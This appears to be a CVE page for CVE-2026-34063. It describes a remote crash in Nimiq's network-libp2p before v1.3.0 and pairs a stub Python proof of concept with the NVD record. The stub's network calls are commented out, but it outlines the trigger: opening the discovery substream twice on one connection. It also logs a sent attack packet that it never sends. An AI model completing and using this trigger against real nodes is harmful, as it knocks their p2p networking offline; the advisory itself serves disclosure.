CVE-2026-34063

import asyncio import logging # This is a conceptual PoC to demonstrate the vulnerability trigger logic. # Actual exploitation requires implementing the libp2p protocol handshake. async def trigger_vulnerability(target_ip, target_port): logging.basicConfig(level=logging.INFO) # 1. Establish a connection to the target Nimiq node # In a real scenario, this would be a libp2p TCP connection logging.info(f"Connecting to {target_ip}:{target_port}...") # reader, writer = await asyncio.open_connection(target_ip, target_port) # 2. Perform libp2p handshake (Multistream-select) # Assuming handshake succeeds and connection is established logging.info("Connection established. Simulating discovery substream...") # 3. Open first discovery substream (Normal behavior) # The handler accepts this and sets state to 'connected' logging.info("Opening first discovery substream...") # send_protocol_request(writer, "/nimiq/1.0.0/discovery") # 4. Open second discovery substream (Trigger vulnerability) # The handler expects only one substream. Opening a second one # triggers the panic: "Inbound/Outbound already connected" logging.info("Opening second discovery substream (Triggering Panic)...") # send_protocol_request(writer, "/nimiq/1.0.0/discovery") # Result: The remote node's task panics and crashes, taking the P2P network offline. logging.info("Attack packet sent. Remote node should crash.") # writer.close() # await writer.wait_closed() if __name__ == "__main__": # Replace with actual target asyncio.run(trigger_vulnerability("127.0.0.1", 8444))

{"cve": {"id": "CVE-2026-34063", "sourceIdentifier": "[email protected]", "published": "2026-04-22T20:16:40.713", "lastModified": "2026-04-24T17:12:23.350", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Nimiq's network-libp2p is a Nimiq network implementation based on libp2p. Prior to version 1.3.0, `network-libp2p` discovery uses a libp2p `ConnectionHandler` state machine. the handler assumes there is at most one inbound and one outbound discovery substream per connection. if a remote peer opens/negotiate the discovery protocol substream a second time on the same connection, the handler hits a `panic!(\\\"Inbound already connected\\\")` / `panic!(\\\"Outbound already connected\\\")` path instead of failing closed. This causes a remote crash of the networking task (swarm), taking the node's p2p networking offline until restart. The patch for this vulnerability is formally released as part of v1.3.0. No known workarounds are available."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-617"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:nimiq:nimiq_proof-of-stake:*:*:*:*:*:rust:*:*", "versionEndExcluding": "1.3.0", "matchCriteriaId": "CD0CAAD1-7626-4A4A-A6F8-9DC46FE50731"}]}]}], "references": [{"url": "https://github.com/nimiq/core-rs-albatross/commit/e0d4e01994f061bf41d3c2835bc74040d3c084f5", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/nimiq/core-rs-albatross/pull/3666", "source": "[email protected]", "tags": ["Issue Tracking", "Patch"]}, {"url": "https://github.com/nimiq/core-rs-albatross/releases/tag/v1.3.0", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/nimiq/core-rs-albatross/security/advisories/GHSA-74hp-mhfx-m45h", "source": "[email protected]", "tags": ["Patch", "Vendor Advisory"]}]}}